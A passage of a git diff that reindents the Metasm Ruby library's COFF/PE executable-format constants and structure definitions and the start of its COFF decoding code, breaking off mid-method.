'CONTAINS_UDATA', - 0x100 => 'LNK_OTHER', 0x200 => 'LNK_INFO', 0x800 => 'LNK_REMOVE', - 0x1000 => 'LNK_COMDAT', 0x8000 => 'GPREL', - 0x20000 => 'MEM_PURGEABLE|16BIT', 0x40000 => 'MEM_LOCKED', 0x80000 => 'MEM_PRELOAD', - 0x100000 => 'ALIGN_1BYTES', 0x200000 => 'ALIGN_2BYTES', - 0x300000 => 'ALIGN_4BYTES', 0x400000 => 'ALIGN_8BYTES', - 0x500000 => 'ALIGN_16BYTES', 0x600000 => 'ALIGN_32BYTES', - 0x700000 => 'ALIGN_64BYTES', 0x800000 => 'ALIGN_128BYTES', - 0x900000 => 'ALIGN_256BYTES', 0xA00000 => 'ALIGN_512BYTES', - 0xB00000 => 'ALIGN_1024BYTES', 0xC00000 => 'ALIGN_2048BYTES', - 0xD00000 => 'ALIGN_4096BYTES', 0xE00000 => 'ALIGN_8192BYTES', - 0x01000000 => 'LNK_NRELOC_OVFL', 0x02000000 => 'MEM_DISCARDABLE', - 0x04000000 => 'MEM_NOT_CACHED', 0x08000000 => 'MEM_NOT_PAGED', - 0x10000000 => 'MEM_SHARED', 0x20000000 => 'MEM_EXECUTE', - 0x40000000 => 'MEM_READ', 0x80000000 => 'MEM_WRITE' - } - # NRELOC_OVFL means there are more than 0xffff reloc - # the reloc count must be set to 0xffff, and the real reloc count - # is the VA of the first relocation - - ORDINAL_REGEX = /^Ordinal_(\d+)$/ - - COMIMAGE_FLAGS = { - 1 => 'ILONLY', 2 => '32BITREQUIRED', 4 => 'IL_LIBRARY', - 8 => 'STRONGNAMESIGNED', 16 => 'NATIVE_ENTRYPOINT', - 0x10000 => 'TRACKDEBUGDATA' - } - - class SerialStruct < Metasm::SerialStruct - new_int_field :xword - end - - class Header < SerialStruct - half :machine, 'I386', MACHINE - half :num_sect - words :time, :ptr_sym, :num_sym - half :size_opthdr - half :characteristics - fld_bits :characteristics, CHARACTERISTIC_BITS - end - - # present in linked files (exe/dll/kmod) - class OptionalHeader < SerialStruct - half :signature, 'PE', SIGNATURE - bytes :link_ver_maj, :link_ver_min - words :code_size, :data_size, :udata_size, :entrypoint, :base_of_code - # base_of_data does not exist in 64-bit - new_field(:base_of_data, lambda { |exe, hdr| exe.decode_word if exe.bitsize != 64 }, lambda { |exe, hdr, val| exe.encode_word(val) if exe.bitsize != 64 }, 0) - # NT-specific fields - xword :image_base - words :sect_align, :file_align - halfs :os_ver_maj, :os_ver_min, :img_ver_maj, :img_ver_min, :subsys_maj, :subsys_min - words :reserved, :image_size, :headers_size, :checksum - half :subsystem, 0, SUBSYSTEM - half :dll_characts - fld_bits :dll_characts, DLL_CHARACTERISTIC_BITS - xwords :stack_reserve, :stack_commit, :heap_reserve, :heap_commit - words :ldrflags, :numrva - end - - # COFF relocatable object symbol (table offset found in the Header.ptr_sym) - class Symbol < SerialStruct - str :name, 8 # if the 1st 4 bytes are 0, the word at 4...8 is the name index in the string table - word :value - half :sec_nr - fld_enum :sec_nr, SYMBOL_SECTION - bitfield :half, 0 => :type_base, 4 => :type - fld_enum :type_base, SYMBOL_BTYPE - fld_enum :type, SYMBOL_TYPE - bytes :storage, :nr_aux - fld_enum :storage, SYMBOL_STORAGE - - attr_accessor :aux - end - - class Section < SerialStruct - str :name, 8 - words :virtsize, :virtaddr, :rawsize, :rawaddr, :relocaddr, :linenoaddr - halfs :relocnr, :linenonr - word :characteristics - fld_bits :characteristics, SECTION_CHARACTERISTIC_BITS - - attr_accessor :encoded, :relocs - end - - # COFF relocatable object relocation (per section, see relocaddr/relocnr) - class RelocObj < SerialStruct - word :va - word :symidx - half :type - fld_enum(:type) { |coff, rel| RELOCATION_TYPE[coff.header.machine] || {} } - attr_accessor :sym - end - - # lists the functions/addresses exported to the OS (pendant of ImportDirectory) - class ExportDirectory < SerialStruct - words :reserved, :timestamp - halfs :version_major, :version_minor - words :libname_p, :ordinal_base, :num_exports, :num_names, :func_p, :names_p, :ord_p - attr_accessor :libname, :exports - - class Export - attr_accessor :forwarder_lib, :forwarder_ordinal, :forwarder_name, :target, :target_rva, :name_p, :name, :ordinal - end - end - - # contains the name of dynamic libraries required by the program, and the function to import from them - class ImportDirectory < SerialStruct - words :ilt_p, :timestamp, :firstforwarder, :libname_p, :iat_p - fld_default :firstforwarder, 0xffff_ffff - attr_accessor :libname, :imports, :iat - - class Import - attr_accessor :ordinal, :hint, :hintname_p, :name, :target, :thunk - end - end - - # tree-like structure, holds all misc data the program might need (icons, cursors, version information) - # conventionnally structured in a 3-level depth structure: - # I resource type (icon/cursor/etc, see +TYPES+) - # II resource id (icon n1, icon 'toto', ...) - # III language-specific version (icon n1 en, icon n1 en-dvorak...) - class ResourceDirectory < SerialStruct - words :characteristics, :timestamp - halfs :major_version, :minor_version, :nr_names, :nr_id - attr_accessor :entries - attr_accessor :curoff_label # internal use, in encoder - - class Entry - attr_accessor :name_p, :name, :name_w, - :id, :subdir_p, :subdir, :dataentry_p, - :data_p, :data, :codepage, :reserved - end - end - - # array of relocations to apply to an executable file - # when it is loaded at an address that is not its preferred_base_address - class RelocationTable < SerialStruct - word :base_addr - attr_accessor :relocs - - class Relocation < SerialStruct - bitfield :half, 0 => :offset, 12 => :type - fld_enum :type, BASE_RELOCATION_TYPE - end - end - - class DebugDirectory < SerialStruct - words :characteristics, :timestamp - halfs :major_version, :minor_version - words :type, :size_of_data, :addr, :pointer - fld_enum :type, DEBUG_TYPE - - attr_accessor :data - - class NB10 < SerialStruct - word :offset - word :signature - word :age - strz :pdbfilename - end - - class RSDS < SerialStruct - mem :guid, 16 - word :age - strz :pdbfilename - end - end - - class TLSDirectory < SerialStruct - xwords :start_va, :end_va, :index_addr, :callback_p + CHARACTERISTIC_BITS = { + 0x0001 => 'RELOCS_STRIPPED', 0x0002 => 'EXECUTABLE_IMAGE', + 0x0004 => 'LINE_NUMS_STRIPPED', 0x0008 => 'LOCAL_SYMS_STRIPPED', + 0x0010 => 'AGGRESSIVE_WS_TRIM', 0x0020 => 'LARGE_ADDRESS_AWARE', + 0x0040 => 'x16BIT_MACHINE', 0x0080 => 'BYTES_REVERSED_LO', + 0x0100 => 'x32BIT_MACHINE', 0x0200 => 'DEBUG_STRIPPED', + 0x0400 => 'REMOVABLE_RUN_FROM_SWAP', 0x0800 => 'NET_RUN_FROM_SWAP', + 0x1000 => 'SYSTEM', 0x2000 => 'DLL', + 0x4000 => 'UP_SYSTEM_ONLY', 0x8000 => 'BYTES_REVERSED_HI' + } + + MACHINE = { + 0x0 => 'UNKNOWN', 0x184 => 'ALPHA', 0x1c0 => 'ARM', + 0x1d3 => 'AM33', 0x8664=> 'AMD64', 0xebc => 'EBC', + 0x9041=> 'M32R', 0x1f1 => 'POWERPCFP', + 0x284 => 'ALPHA64', 0x14c => 'I386', 0x200 => 'IA64', + 0x268 => 'M68K', 0x266 => 'MIPS16', 0x366 => 'MIPSFPU', + 0x466 => 'MIPSFPU16', 0x1f0 => 'POWERPC', 0x162 => 'R3000', + 0x166 => 'R4000', 0x168 => 'R10000', 0x1a2 => 'SH3', + 0x1a3 => 'SH3DSP', 0x1a6 => 'SH4', 0x1a8 => 'SH5', + 0x1c2 => 'THUMB', 0x169 => 'WCEMIPSV2' + } + + # PE+ is for 64bits address spaces + SIGNATURE = { 0x10b => 'PE', 0x20b => 'PE+', 0x107 => 'ROM' } + + SUBSYSTEM = { + 0 => 'UNKNOWN', 1 => 'NATIVE', 2 => 'WINDOWS_GUI', + 3 => 'WINDOWS_CUI', 5 => 'OS/2_CUI', 7 => 'POSIX_CUI', + 8 => 'WIN9X_DRIVER', 9 => 'WINDOWS_CE_GUI', + 10 => 'EFI_APPLICATION', + 11 => 'EFI_BOOT_SERVICE_DRIVER', 12 => 'EFI_RUNTIME_DRIVER', + 13 => 'EFI_ROM', 14 => 'XBOX' + } + + DLL_CHARACTERISTIC_BITS = { + 0x40 => 'DYNAMIC_BASE', 0x80 => 'FORCE_INTEGRITY', 0x100 => 'NX_COMPAT', + 0x200 => 'NO_ISOLATION', 0x400 => 'NO_SEH', 0x800 => 'NO_BIND', + 0x2000 => 'WDM_DRIVER', 0x8000 => 'TERMINAL_SERVER_AWARE' + } + + BASE_RELOCATION_TYPE = { 0 => 'ABSOLUTE', 1 => 'HIGH', 2 => 'LOW', 3 => 'HIGHLOW', + 4 => 'HIGHADJ', 5 => 'MIPS_JMPADDR', 9 => 'MIPS_JMPADDR16', 10 => 'DIR64' + } + + RELOCATION_TYPE = Hash.new({}).merge( + 'AMD64' => { 0 => 'ABSOLUTE', 1 => 'ADDR64', 2 => 'ADDR32', 3 => 'ADDR32NB', + 4 => 'REL32', 5 => 'REL32_1', 6 => 'REL32_2', 7 => 'REL32_3', + 8 => 'REL32_4', 9 => 'REL32_5', 10 => 'SECTION', 11 => 'SECREL', + 12 => 'SECREL7', 13 => 'TOKEN', 14 => 'SREL32', 15 => 'PAIR', + 16 => 'SSPAN32' }, + 'ARM' => { 0 => 'ABSOLUTE', 1 => 'ADDR32', 2 => 'ADDR32NB', 3 => 'BRANCH24', + 4 => 'BRANCH11', 14 => 'SECTION', 15 => 'SECREL' }, + 'I386' => { 0 => 'ABSOLUTE', 1 => 'DIR16', 2 => 'REL16', 6 => 'DIR32', + 7 => 'DIR32NB', 9 => 'SEG12', 10 => 'SECTION', 11 => 'SECREL', + 12 => 'TOKEN', 13 => 'SECREL7', 20 => 'REL32' } + ) + + # lsb of symbol type, unused + SYMBOL_BTYPE = { 0 => 'NULL', 1 => 'VOID', 2 => 'CHAR', 3 => 'SHORT', + 4 => 'INT', 5 => 'LONG', 6 => 'FLOAT', 7 => 'DOUBLE', 8 => 'STRUCT', + 9 => 'UNION', 10 => 'ENUM', 11 => 'MOE', 12 => 'BYTE', 13 => 'WORD', + 14 => 'UINT', 15 => 'DWORD'} + SYMBOL_TYPE = { 0 => 'NULL', 1 => 'POINTER', 2 => 'FUNCTION', 3 => 'ARRAY' } + SYMBOL_SECTION = { 0 => 'UNDEF', 0xffff => 'ABS', 0xfffe => 'DEBUG' } + SYMBOL_STORAGE = { 0xff => 'EOF', 0 => 'NULL', 1 => 'AUTO', 2 => 'EXTERNAL', + 3 => 'STATIC', 4 => 'REGISTER', 5 => 'EXT_DEF', 6 => 'LABEL', + 7 => 'UNDEF_LABEL', 8 => 'STRUCT_MEMBER', 9 => 'ARGUMENT', 10 => 'STRUCT_TAG', + 11 => 'UNION_MEMBER', 12 => 'UNION_TAG', 13 => 'TYPEDEF', 14 => 'UNDEF_STATIC', + 15 => 'ENUM_TAG', 16 => 'ENUM_MEMBER', 17 => 'REG_PARAM', 18 => 'BIT_FIELD', + 100 => 'BLOCK', 101 => 'FUNCTION', 102 => 'END_STRUCT', + 103 => 'FILE', 104 => 'SECTION', 105 => 'WEAK_EXT', + } + + DEBUG_TYPE = { 0 => 'UNKNOWN', 1 => 'COFF', 2 => 'CODEVIEW', 3 => 'FPO', 4 => 'MISC', + 5 => 'EXCEPTION', 6 => 'FIXUP', 7 => 'OMAP_TO_SRC', 8 => 'OMAP_FROM_SRC', + 9 => 'BORLAND', 10 => 'RESERVED10', 11 => 'CLSID' } + + DIRECTORIES = %w[export_table import_table resource_table exception_table certificate_table + base_relocation_table debug architecture global_ptr tls_table load_config + bound_import iat delay_import com_runtime reserved] + + SECTION_CHARACTERISTIC_BITS = { + 0x20 => 'CONTAINS_CODE', 0x40 => 'CONTAINS_DATA', 0x80 => 'CONTAINS_UDATA', + 0x100 => 'LNK_OTHER', 0x200 => 'LNK_INFO', 0x800 => 'LNK_REMOVE', + 0x1000 => 'LNK_COMDAT', 0x8000 => 'GPREL', + 0x20000 => 'MEM_PURGEABLE|16BIT', 0x40000 => 'MEM_LOCKED', 0x80000 => 'MEM_PRELOAD', + 0x100000 => 'ALIGN_1BYTES', 0x200000 => 'ALIGN_2BYTES', + 0x300000 => 'ALIGN_4BYTES', 0x400000 => 'ALIGN_8BYTES', + 0x500000 => 'ALIGN_16BYTES', 0x600000 => 'ALIGN_32BYTES', + 0x700000 => 'ALIGN_64BYTES', 0x800000 => 'ALIGN_128BYTES', + 0x900000 => 'ALIGN_256BYTES', 0xA00000 => 'ALIGN_512BYTES', + 0xB00000 => 'ALIGN_1024BYTES', 0xC00000 => 'ALIGN_2048BYTES', + 0xD00000 => 'ALIGN_4096BYTES', 0xE00000 => 'ALIGN_8192BYTES', + 0x01000000 => 'LNK_NRELOC_OVFL', 0x02000000 => 'MEM_DISCARDABLE', + 0x04000000 => 'MEM_NOT_CACHED', 0x08000000 => 'MEM_NOT_PAGED', + 0x10000000 => 'MEM_SHARED', 0x20000000 => 'MEM_EXECUTE', + 0x40000000 => 'MEM_READ', 0x80000000 => 'MEM_WRITE' + } + # NRELOC_OVFL means there are more than 0xffff reloc + # the reloc count must be set to 0xffff, and the real reloc count + # is the VA of the first relocation + + ORDINAL_REGEX = /^Ordinal_(\d+)$/ + + COMIMAGE_FLAGS = { + 1 => 'ILONLY', 2 => '32BITREQUIRED', 4 => 'IL_LIBRARY', + 8 => 'STRONGNAMESIGNED', 16 => 'NATIVE_ENTRYPOINT', + 0x10000 => 'TRACKDEBUGDATA' + } + + class SerialStruct < Metasm::SerialStruct + new_int_field :xword + end + + class Header < SerialStruct + half :machine, 'I386', MACHINE + half :num_sect + words :time, :ptr_sym, :num_sym + half :size_opthdr + half :characteristics + fld_bits :characteristics, CHARACTERISTIC_BITS + end + + # present in linked files (exe/dll/kmod) + class OptionalHeader < SerialStruct + half :signature, 'PE', SIGNATURE + bytes :link_ver_maj, :link_ver_min + words :code_size, :data_size, :udata_size, :entrypoint, :base_of_code + # base_of_data does not exist in 64-bit + new_field(:base_of_data, lambda { |exe, hdr| exe.decode_word if exe.bitsize != 64 }, lambda { |exe, hdr, val| exe.encode_word(val) if exe.bitsize != 64 }, 0) + # NT-specific fields + xword :image_base + words :sect_align, :file_align + halfs :os_ver_maj, :os_ver_min, :img_ver_maj, :img_ver_min, :subsys_maj, :subsys_min + words :reserved, :image_size, :headers_size, :checksum + half :subsystem, 0, SUBSYSTEM + half :dll_characts + fld_bits :dll_characts, DLL_CHARACTERISTIC_BITS + xwords :stack_reserve, :stack_commit, :heap_reserve, :heap_commit + words :ldrflags, :numrva + end + + # COFF relocatable object symbol (table offset found in the Header.ptr_sym) + class Symbol < SerialStruct + str :name, 8 # if the 1st 4 bytes are 0, the word at 4...8 is the name index in the string table + word :value + half :sec_nr + fld_enum :sec_nr, SYMBOL_SECTION + bitfield :half, 0 => :type_base, 4 => :type + fld_enum :type_base, SYMBOL_BTYPE + fld_enum :type, SYMBOL_TYPE + bytes :storage, :nr_aux + fld_enum :storage, SYMBOL_STORAGE + + attr_accessor :aux + end + + class Section < SerialStruct + str :name, 8 + words :virtsize, :virtaddr, :rawsize, :rawaddr, :relocaddr, :linenoaddr + halfs :relocnr, :linenonr + word :characteristics + fld_bits :characteristics, SECTION_CHARACTERISTIC_BITS + + attr_accessor :encoded, :relocs + end + + # COFF relocatable object relocation (per section, see relocaddr/relocnr) + class RelocObj < SerialStruct + word :va + word :symidx + half :type + fld_enum(:type) { |coff, rel| RELOCATION_TYPE[coff.header.machine] || {} } + attr_accessor :sym + end + + # lists the functions/addresses exported to the OS (pendant of ImportDirectory) + class ExportDirectory < SerialStruct + words :reserved, :timestamp + halfs :version_major, :version_minor + words :libname_p, :ordinal_base, :num_exports, :num_names, :func_p, :names_p, :ord_p + attr_accessor :libname, :exports + + class Export + attr_accessor :forwarder_lib, :forwarder_ordinal, :forwarder_name, :target, :target_rva, :name_p, :name, :ordinal + end + end + + # contains the name of dynamic libraries required by the program, and the function to import from them + class ImportDirectory < SerialStruct + words :ilt_p, :timestamp, :firstforwarder, :libname_p, :iat_p + fld_default :firstforwarder, 0xffff_ffff + attr_accessor :libname, :imports, :iat + + class Import + attr_accessor :ordinal, :hint, :hintname_p, :name, :target, :thunk + end + end + + # tree-like structure, holds all misc data the program might need (icons, cursors, version information) + # conventionnally structured in a 3-level depth structure: + # I resource type (icon/cursor/etc, see +TYPES+) + # II resource id (icon n1, icon 'toto', ...) + # III language-specific version (icon n1 en, icon n1 en-dvorak...) + class ResourceDirectory < SerialStruct + words :characteristics, :timestamp + halfs :major_version, :minor_version, :nr_names, :nr_id + attr_accessor :entries + attr_accessor :curoff_label # internal use, in encoder + + class Entry + attr_accessor :name_p, :name, :name_w, + :id, :subdir_p, :subdir, :dataentry_p, + :data_p, :data, :codepage, :reserved + end + end + + # array of relocations to apply to an executable file + # when it is loaded at an address that is not its preferred_base_address + class RelocationTable < SerialStruct + word :base_addr + attr_accessor :relocs + + class Relocation < SerialStruct + bitfield :half, 0 => :offset, 12 => :type + fld_enum :type, BASE_RELOCATION_TYPE + end + end + + class DebugDirectory < SerialStruct + words :characteristics, :timestamp + halfs :major_version, :minor_version + words :type, :size_of_data, :addr, :pointer + fld_enum :type, DEBUG_TYPE + + attr_accessor :data + + class NB10 < SerialStruct + word :offset + word :signature + word :age + strz :pdbfilename + end + + class RSDS < SerialStruct + mem :guid, 16 + word :age + strz :pdbfilename + end + end + + class TLSDirectory < SerialStruct + xwords :start_va, :end_va, :index_addr, :callback_p words :zerofill_sz, :characteristics - attr_accessor :callbacks - end - - # the 'load configuration' directory (used for SafeSEH) - class LoadConfig < SerialStruct - words :signature, :timestamp - halfs :major_version, :minor_version - words :globalflags_clear, :globalflags_set, :critsec_timeout - # lockpfxtable is an array of VA of LOCK prefixes, to be nopped on singleproc machines (!) - xwords :decommitblock, :decommittotal, :lockpfxtable, :maxalloc, :maxvirtmem, :process_affinity_mask - word :process_heap_flags - halfs :service_pack_id, :reserved - xwords :editlist, :security_cookie, :sehtable_p, :sehcount - - attr_accessor :safeseh - end - - class DelayImportDirectory < SerialStruct - words :attributes, :libname_p, :handle_p, :iat_p, :int_p, :biat_p, :uiat_p, :timestamp - - attr_accessor :libname - end - - # structure defining entrypoints and stuff for .net binaries - class Cor20Header < SerialStruct - word :size - halfs :major_version, :minor_version # runtime version - words :metadata_rva, :metadata_sz - word :flags - fld_bits :flags, COMIMAGE_FLAGS - word :entrypoint # RVA to native or managed ep, depending on flags - words :resources_rva, :resources_sz - words :strongnamesig_rva, :strongnamesig_sz - words :codemgr_rva, :codemgr_sz - words :vtfixup_rva, :vtfixup_sz - words :eatjumps_rva, :eatjumps_sz - words :managednativehdr_rva, :managednativehdr_sz - - attr_accessor :metadata, :resources, :strongnamesig, :codemgr, :vtfixup, :eatjumps, :managednativehdr - end - - # for the icon, the one that appears in the explorer is - # (NT) the one with the lowest ID - # (98) the first to appear in the table - class ResourceDirectory - def to_hash(depth=0) - map = case depth - when 0; TYPE - when 1; {} # resource-id - when 2; {} # lang - else {} - end - @entries.inject({}) { |h, e| - k = e.id ? map.fetch(e.id, e.id) : e.name ? e.name : e.name_w - v = e.subdir ? e.subdir.to_hash(depth+1) : e.data - h.update k => v - } - end - - def self.from_hash(h, depth=0) - map = case depth - when 0; TYPE - when 1; {} # resource-id - when 2; {} # lang - else {} - end - ret = new - ret.entries = h.map { |k, v| - e = Entry.new - k.kind_of?(Integer) ? (e.id = k) : map.index(k) ? (e.id = map.index(k)) : (e.name = k) # name_w ? - v.kind_of?(Hash) ? (e.subdir = from_hash(v, depth+1)) : (e.data = v) - e - } - ret - end - - # returns a string with the to_hash key tree - def to_s - to_s_a(0).join("\n") - end - - def to_s_a(depth) - @entries.map { |e| - ar = [] - ar << if e.id - if depth == 0 and TYPE.has_key?(e.id); "#{e.id.to_s} (#{TYPE[e.id]})".ljust(18) - else e.id.to_s.ljust(5) - end - else (e.name || e.name_w).inspect - end - if e.subdir - sa = e.subdir.to_s_a(depth+1) - if sa.length == 1 - ar.last << " | #{sa.first}" - else - ar << sa.map { |s| ' ' + s } - end - elsif e.data.length > 16 - ar.last << " #{e.data[0, 8].inspect}... <#{e.data.length} bytes>" - else - ar.last << ' ' << e.data.inspect - end - ar - }.flatten - end - - TYPE = { - 1 => 'CURSOR', 2 => 'BITMAP', 3 => 'ICON', 4 => 'MENU', - 5 => 'DIALOG', 6 => 'STRING', 7 => 'FONTDIR', 8 => 'FONT', - 9 => 'ACCELERATOR', 10 => 'RCADATA', 11 => 'MESSAGETABLE', - 12 => 'GROUP_CURSOR', 14 => 'GROUP_ICON', 16 => 'VERSION', - 17 => 'DLGINCLUDE', 19 => 'PLUGPLAY', 20 => 'VXD', - 21 => 'ANICURSOR', 22 => 'ANIICON', 23 => 'HTML', - 24 => 'MANIFEST' - } - - ACCELERATOR_BITS = { - 1 => 'VIRTKEY', 2 => 'NOINVERT', 4 => 'SHIFT', 8 => 'CTRL', - 16 => 'ALT', 128 => 'LAST' - } - - # cursor = raw data, cursor_group = header , pareil pour les icons - class Cursor - attr_accessor :xhotspot, :yhotspot, :data - end - end - - attr_accessor :header, :optheader, :directory, :sections, :endianness, :symbols, :bitsize, - :export, :imports, :resource, :certificates, :relocations, :debug, :tls, :loadconfig, :delayimports, :com_header - - # boolean, set to true to have #decode() ignore the base_relocs directory - attr_accessor :nodecode_relocs - - def initialize(*a) - cpu = a.grep(CPU).first - @nodecode_relocs = true if a.include? :nodecode_relocs - - @directory = {} # DIRECTORIES.key => [rva, size] - @sections = [] - @endianness = cpu ? cpu.endianness : :little - @bitsize = cpu ? cpu.size : 32 - @header = Header.new - @optheader = OptionalHeader.new - super(cpu) - end - - def shortname; 'coff'; end + attr_accessor :callbacks + end + + # the 'load configuration' directory (used for SafeSEH) + class LoadConfig < SerialStruct + words :signature, :timestamp + halfs :major_version, :minor_version + words :globalflags_clear, :globalflags_set, :critsec_timeout + # lockpfxtable is an array of VA of LOCK prefixes, to be nopped on singleproc machines (!) + xwords :decommitblock, :decommittotal, :lockpfxtable, :maxalloc, :maxvirtmem, :process_affinity_mask + word :process_heap_flags + halfs :service_pack_id, :reserved + xwords :editlist, :security_cookie, :sehtable_p, :sehcount + + attr_accessor :safeseh + end + + class DelayImportDirectory < SerialStruct + words :attributes, :libname_p, :handle_p, :iat_p, :int_p, :biat_p, :uiat_p, :timestamp + + attr_accessor :libname + end + + # structure defining entrypoints and stuff for .net binaries + class Cor20Header < SerialStruct + word :size + halfs :major_version, :minor_version # runtime version + words :metadata_rva, :metadata_sz + word :flags + fld_bits :flags, COMIMAGE_FLAGS + word :entrypoint # RVA to native or managed ep, depending on flags + words :resources_rva, :resources_sz + words :strongnamesig_rva, :strongnamesig_sz + words :codemgr_rva, :codemgr_sz + words :vtfixup_rva, :vtfixup_sz + words :eatjumps_rva, :eatjumps_sz + words :managednativehdr_rva, :managednativehdr_sz + + attr_accessor :metadata, :resources, :strongnamesig, :codemgr, :vtfixup, :eatjumps, :managednativehdr + end + + # for the icon, the one that appears in the explorer is + # (NT) the one with the lowest ID + # (98) the first to appear in the table + class ResourceDirectory + def to_hash(depth=0) + map = case depth + when 0; TYPE + when 1; {} # resource-id + when 2; {} # lang + else {} + end + @entries.inject({}) { |h, e| + k = e.id ? map.fetch(e.id, e.id) : e.name ? e.name : e.name_w + v = e.subdir ? e.subdir.to_hash(depth+1) : e.data + h.update k => v + } + end + + def self.from_hash(h, depth=0) + map = case depth + when 0; TYPE + when 1; {} # resource-id + when 2; {} # lang + else {} + end + ret = new + ret.entries = h.map { |k, v| + e = Entry.new + k.kind_of?(Integer) ? (e.id = k) : map.index(k) ? (e.id = map.index(k)) : (e.name = k) # name_w ? + v.kind_of?(Hash) ? (e.subdir = from_hash(v, depth+1)) : (e.data = v) + e + } + ret + end + + # returns a string with the to_hash key tree + def to_s + to_s_a(0).join("\n") + end + + def to_s_a(depth) + @entries.map { |e| + ar = [] + ar << if e.id + if depth == 0 and TYPE.has_key?(e.id); "#{e.id.to_s} (#{TYPE[e.id]})".ljust(18) + else e.id.to_s.ljust(5) + end + else (e.name || e.name_w).inspect + end + if e.subdir + sa = e.subdir.to_s_a(depth+1) + if sa.length == 1 + ar.last << " | #{sa.first}" + else + ar << sa.map { |s| ' ' + s } + end + elsif e.data.length > 16 + ar.last << " #{e.data[0, 8].inspect}... <#{e.data.length} bytes>" + else + ar.last << ' ' << e.data.inspect + end + ar + }.flatten + end + + TYPE = { + 1 => 'CURSOR', 2 => 'BITMAP', 3 => 'ICON', 4 => 'MENU', + 5 => 'DIALOG', 6 => 'STRING', 7 => 'FONTDIR', 8 => 'FONT', + 9 => 'ACCELERATOR', 10 => 'RCADATA', 11 => 'MESSAGETABLE', + 12 => 'GROUP_CURSOR', 14 => 'GROUP_ICON', 16 => 'VERSION', + 17 => 'DLGINCLUDE', 19 => 'PLUGPLAY', 20 => 'VXD', + 21 => 'ANICURSOR', 22 => 'ANIICON', 23 => 'HTML', + 24 => 'MANIFEST' + } + + ACCELERATOR_BITS = { + 1 => 'VIRTKEY', 2 => 'NOINVERT', 4 => 'SHIFT', 8 => 'CTRL', + 16 => 'ALT', 128 => 'LAST' + } + + # cursor = raw data, cursor_group = header , pareil pour les icons + class Cursor + attr_accessor :xhotspot, :yhotspot, :data + end + end + + attr_accessor :header, :optheader, :directory, :sections, :endianness, :symbols, :bitsize, + :export, :imports, :resource, :certificates, :relocations, :debug, :tls, :loadconfig, :delayimports, :com_header + + # boolean, set to true to have #decode() ignore the base_relocs directory + attr_accessor :nodecode_relocs + + def initialize(*a) + cpu = a.grep(CPU).first + @nodecode_relocs = true if a.include? :nodecode_relocs + + @directory = {} # DIRECTORIES.key => [rva, size] + @sections = [] + @endianness = cpu ? cpu.endianness : :little + @bitsize = cpu ? cpu.size : 32 + @header = Header.new + @optheader = OptionalHeader.new + super(cpu) + end + + def shortname; 'coff'; end end # the COFF archive file format # maybe used in .lib files (they hold binary import information for libraries) # used for unix .a static library files (with no 2nd linker and newline-separated longnames) class COFFArchive < ExeFormat - class Member < SerialStruct - mem :name, 16 - mem :date, 12 - mem :uid, 6 - mem :gid, 6 - mem :mode, 8 - mem :size, 10 - mem :eoh, 2 - - attr_accessor :offset, :encoded - end - - class ImportHeader < SerialStruct - halfs :sig1, :sig2, :version, :machine - words :timestamp, :size_of_data - half :hint - bitfield :half, 0 => :reserved, 11 => :name_type, 14 => :type - #fld_enum :type, IMPORT_TYPE - #fld_enum :name_type, NAME_TYPE - strz :symname - strz :libname - end - - attr_accessor :members, :signature, :first_linker, :second_linker, :longnames - - # return the 1st member whose name is name - def member(name) - @members.find { |m| m.name == name } - end + class Member < SerialStruct + mem :name, 16 + mem :date, 12 + mem :uid, 6 + mem :gid, 6 + mem :mode, 8 + mem :size, 10 + mem :eoh, 2 + + attr_accessor :offset, :encoded + end + + class ImportHeader < SerialStruct + halfs :sig1, :sig2, :version, :machine + words :timestamp, :size_of_data + half :hint + bitfield :half, 0 => :reserved, 11 => :name_type, 14 => :type + #fld_enum :type, IMPORT_TYPE + #fld_enum :name_type, NAME_TYPE + strz :symname + strz :libname + end + + attr_accessor :members, :signature, :first_linker, :second_linker, :longnames + + # return the 1st member whose name is name + def member(name) + @members.find { |m| m.name == name } + end end end diff --git a/lib/metasm/metasm/exe_format/coff_decode.rb b/lib/metasm/metasm/exe_format/coff_decode.rb index 5d28012a8fc31..5a718a13fea48 100644 --- a/lib/metasm/metasm/exe_format/coff_decode.rb +++ b/lib/metasm/metasm/exe_format/coff_decode.rb @@ -9,893 +9,893 @@ module Metasm class COFF - class OptionalHeader - decode_hook(:entrypoint) { |coff, ohdr| - coff.bitsize = (ohdr.signature == 'PE+' ? 64 : 32) - } - - # decodes a COFF optional header from coff.cursection - # also decodes directories in coff.directory - def decode(coff) - return set_default_values(coff) if coff.header.size_opthdr == 0 - super(coff) - - nrva = @numrva - if @numrva > DIRECTORIES.length - puts "W: COFF: Invalid directories count #{@numrva}" if $VERBOSE - nrva = DIRECTORIES.length - end - - coff.directory = {} - DIRECTORIES[0, nrva].each { |dir| - rva = coff.decode_word - sz = coff.decode_word - if rva != 0 or sz != 0 - coff.directory[dir] = [rva, sz] - end - } - end - end - - class Symbol - def decode(coff, strtab='') - n0, n1 = coff.decode_word, coff.decode_word - coff.encoded.ptr -= 8 - - super(coff) - - if n0 == 0 and ne = strtab.index(?\0, n1) - @name = strtab[n1...ne] - end - return if @nr_aux == 0 - - @aux = [] - @nr_aux.times { @aux << coff.encoded.read(18) } - end - end - - class Section - def decode(coff) - super(coff) - coff.decode_section_body(self) - end - end - - class RelocObj - def decode(coff) - super(coff) - @sym = coff.symbols[@symidx] - end - end - - class ExportDirectory - # decodes a COFF export table from coff.cursection - def decode(coff) - super(coff) - - if coff.sect_at_rva(@libname_p) - @libname = coff.decode_strz - end - - if coff.sect_at_rva(@func_p) - @exports = [] - addrs = [] - @num_exports.times { addrs << coff.decode_word } - @num_exports.times { |i| - e = Export.new - e.ordinal = i + @ordinal_base - addr = addrs[i] - if addr >= coff.directory['export_table'][0] and addr < coff.directory['export_table'][0] + coff.directory['export_table'][1] and coff.sect_at_rva(addr) - name = coff.decode_strz - e.forwarder_lib, name = name.split('.', 2) - if name[0] == ?# - e.forwarder_ordinal = name[1..-1].to_i - else - e.forwarder_name = name - end - else - e.target = e.target_rva = addr - end - @exports << e - } - end - if coff.sect_at_rva(@names_p) - namep = [] - num_names.times { namep << coff.decode_word } - end - if coff.sect_at_rva(@ord_p) - ords = [] - num_names.times { ords << coff.decode_half } - end - if namep and ords - namep.zip(ords).each { |np, oi| - @exports[oi].name_p = np - if coff.sect_at_rva(np) - @exports[oi].name = coff.decode_strz - end - } - end - end - end - - class ImportDirectory - # decodes all COFF import directories from coff.cursection - def self.decode_all(coff) - ret = [] - loop do - idata = decode(coff) - break if [idata.ilt_p, idata.libname_p].uniq == [0] - ret << idata - end - ret.each { |idata| idata.decode_inner(coff) } - ret - end - - # decode the tables referenced - def decode_inner(coff) - if 